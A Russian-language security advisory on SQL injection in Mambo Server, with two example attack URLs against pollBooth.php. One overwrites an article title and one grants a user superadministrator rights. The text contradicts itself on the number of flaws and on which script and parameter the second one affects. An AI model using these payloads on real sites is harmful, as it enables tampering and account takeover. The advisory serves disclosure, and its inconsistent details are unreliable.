Sql инъекция в Mambo Server

Дата публикации:
13.12.2003
Всего просмотров:
1374
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Mambo Server 4.0.14 и 4.5 Beta 1.0.3

Описание: Две уязвимости обнаружены в Mambo Server. Злонамеренный пользователь может манипулировать SQL запросами.

1. SQL инъекция обнаружена в "dbprefix" параметре в "pollBooth.php" сценарии. Пример:

http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID =1&dbprefix=mos_articles%20SET%20title=char(104,111,112)
%20WHERE artid=23/*
2. инъекция обнаружена в "artid" параметре в "articles.php" сценарии. Пример:
http://[target]/pollBooth.php?task=Vote&lang=eng&sessioncookie=1&
voteID=1&dbprefix=mos_users%20SET%20usertype=char(115,117,
112,101,114,97,100,109,105,1 10,105,115,116,114,97,116,111,114)
%20WHERE%20id=52/*

URL производителя: http://www.mamboserver.com/

Решение: Установите patch 2 для версии 4.0.1

Ссылки: Multiple vulnerabilities in Mambo Server

или введите имя

CAPTCHA